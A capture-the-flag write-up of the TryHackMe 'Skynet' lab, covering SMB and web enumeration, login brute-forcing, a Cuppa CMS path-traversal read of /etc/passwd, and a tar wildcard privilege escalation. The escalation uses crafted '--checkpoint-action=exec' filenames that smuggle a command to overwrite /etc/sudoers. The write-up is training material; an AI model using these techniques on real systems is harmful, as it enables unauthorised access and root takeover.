TryHackMe - Skynet write up
about the machine
skynet is an easy-rated machine from TryHackMe with the themes being samba/http enumeration and file inclusion
Reconnaissance
As always I added the box to my /etc/hosts file as ctf.thm and ran a detailed nmap scan against it
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
# Nmap 7.60SVN scan initiated Tue Feb 9 23:06:16 2021 as: nmap -v -sC -sV -oN detailed_scan ctf.thm
Host is up (0.81s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE TOP PIPELINING SASL RESP-CODES UIDL CAPA
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 have listed LITERAL+ capabilities OK Pre-login more IDLE ID SASL-IR IMAP4rev1 ENABLE post-login LOGIN-REFERRALS
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| SKYNET<00> Flags: <unique><active>
| SKYNET<03> Flags: <unique><active>
| SKYNET<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2021-02-09T16:06:40-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-09 23:06:40
|_ start_date: N/A
as you can see, http and samba are up, which will be my ticket to get in
Samba enumeration
after some digging around, I found a share called anonymous which was readable by unauthenticated users
1
2
3
4
5
6
7
8
9
$ ./smbmap.py -H ctf.thm
[+] IP: ctf.thm:445 Name: unknown Status: Guest session
Disk Permissions Comment
---- ----------- ------
print$ NO ACCESS Printer Drivers
anonymous READ ONLY Skynet Anonymous Share
milesdyson NO ACCESS Miles Dyson Personal Share
IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
I’ve also got a username using enum4linux
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ enum4linux.pl -U ctf.thm
===============================================
| Enumerating Workgroup/Domain on ctf.thm |
===============================================
[+] Got domain/workgroup name: WORKGROUP
================================
| Session Check on ctf.thm |
================================
[+] Server ctf.thm allows sessions using username '', password ''
========================
| Users on ctf.thm |
========================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc:
inside the anonymous share, I’ve a found a note telling people to change their password, along with a wordlist
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ smbclient //ctf.thm/anonymous -U "" % ""
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
. D 0 Thu Nov 26 17:04:00 2020
.. D 0 Tue Sep 17 08:20:17 2019
attention.txt N 163 Wed Sep 18 04:04:59 2019
logs D 0 Wed Sep 18 05:42:16 2019
9204224 blocks of size 1024. 5831512 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> cd logs\
smb: \logs\> ls
. D 0 Wed Sep 18 05:42:16 2019
.. D 0 Thu Nov 26 17:04:00 2020
log2.txt N 0 Wed Sep 18 05:42:13 2019
log1.txt N 471 Wed Sep 18 05:41:59 2019
log3.txt N 0 Wed Sep 18 05:42:16 2019
9204224 blocks of size 1024. 5831512 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (0.3 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \logs\> exit
$ cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
$ wc -l log1.txt
31 log1.txt
I didn’t know where to use the wordlist, so I moved to http
http enumeration
vising ctf.thm in the browser, I found a static page with no robots.txt file
I so did some directory bruteforcing with gobuster and found some interesting directories
1
2
3
4
5
6
7
8
gobuster dir -u ctf.thm -w $WORDLISTS/raft-medium-directories-lowercase.txt -t 30
/admin (Status: 301)
/js (Status: 301)
/config (Status: 301)
/css (Status: 301)
/squirrelmail (Status: 301)
/ai (Status: 301)
/server-status (Status: 403)
/admin kept giving me forbidden status, but /squirrelmail redirected me to a login page
now that I’ve got a user and a wordlist, it’s time to fire up burpbsuite for some brutforcing
it got the password right away, I can’t show it here tho
after logging in, I’ve found 3 emails, one with milesdyson’s samba password, and the other two referenceing what is believed to be an interesting AI conversation
back to smb
now that I have milesdyson’s password, I can just re-visit his samba share, where I found a note countaining an hidden http directory
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
$ smbclient //ctf.thm/milesdyson -U milesdyson
Enter milesdyson's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
. D 0 Tue Sep 17 10:05:47 2019
.. D 0 Wed Sep 18 04:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 10:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 10:05:14 2019
notes D 0 Tue Sep 17 10:18:40 2019
9204224 blocks of size 1024. 5831444 blocks available
smb: \> cd notes
smb: \notes\> ls
. D 0 Tue Sep 17 10:18:40 2019
.. D 0 Tue Sep 17 10:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 10:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 10:01:29 2019
....
important.txt N 117 Tue Sep 17 10:18:39 2019
....
1.02 Linear Algebra.md N 70314 Tue Sep 17 10:01:29 2019
....
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \notes\> exit
$ cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
http hidden directory
the webpage contained a static page with nothing interesting, so I bruteforced for directories again and found another panel running cuppa CMS
1
2
$ gobuster dir -u http://10.10.111.111/45kra24zxs28v3yd/ -w $WORDLISTS/raft-medium-directories-lowercase.txt -t 30
/administrator (Status: 301)
which redirected me to another login page
I tried loging in with the http creds I’ve got before, as well as bruteforce with the wordlist I have, but nothing worked
after sometime I found that the CMS has both a local and a remote file inclusion vulnerability
1
2
3
4
5
6
$ searchsploit cuppa
-------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
-------------------------------------------------------------------------------- ---------------------------------
it turned I can include local/remote files from the /alerts/alertConfigField.php?urlConfig= endpoint
so I tried including /etc/passwd, by visiting ctf.thm/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../etc/passwd and it worked
since I know the user, I went ahead and included user.txt from milesdyson’s home directory, I’ve looked around for some configuration files or ssh keys but didn’t find anything so the next step was to get a reverse shell via remote file inclusion
I sat up an http server using python to deliver a php reverse shell and an nc listener to receive the connection back
gaining root priveleges
I found a script running as root using tar and wildcards in /home/milesdyson/backups
1
2
3
4
5
6
7
8
9
10
11
12
13
www-data@skynet:/home/milesdyson$ ls
backups mail share user.txt
www-data@skynet:/home/milesdyson$ ls -lh user.txt
-rw-r--r-- 1 milesdyson milesdyson 33 Sep 17 2019 user.txt
www-data@skynet:/home/milesdyson$ cd backups
www-data@skynet:/home/milesdyson/backups$ ls -lh
total 4.5M
-rwxr-xr-x 1 root root 74 Sep 17 2019 backup.sh
-rw-r--r-- 1 root root 4.5M Feb 10 14:51 backup.tgz
www-data@skynet:/home/milesdyson/backups$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
at this point, what should I do is pretty stright forward, just a little trick with tar to edit /etc/sudoers, basically giving me the abillity to use sudo as root without a password
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
www-data@skynet:/home/milesdyson/backups$ cd /var/www/html
www-data@skynet:/var/www/html$ echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh
www-data@skynet:/var/www/html$ echo "" > "--checkpoint-action=exec=sh demo.sh"
www-data@skynet:/var/www/html$ echo "" > "--checkpoint-action=exec=sh priv.sh"
www-data@skynet:/var/www/html$ echo "" > --checkpoint=1
www-data@skynet:/var/www/html$ cd -
/home/milesdyson/backups
www-data@skynet:/home/milesdyson/backups$ ./backup.sh
tar: /home/milesdyson/backups/backup.tgz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
www-data@skynet:/home/milesdyson/backups$ sudo -l
sudo -l
User www-data may run the following commands on skynet:
(root) NOPASSWD: ALL
www-data@skynet:/home/milesdyson/backups$ sudo su
root@skynet:/home/milesdyson/backups# whoami
root
root@skynet:/home/milesdyson/backups# ls /root/ -lh
total 4.0K
-rw-r--r-- 1 root root 33 Sep 17 2019 root.txt
conclusion
this was a really nice box with some fun enumeration, see you in the next write up ^^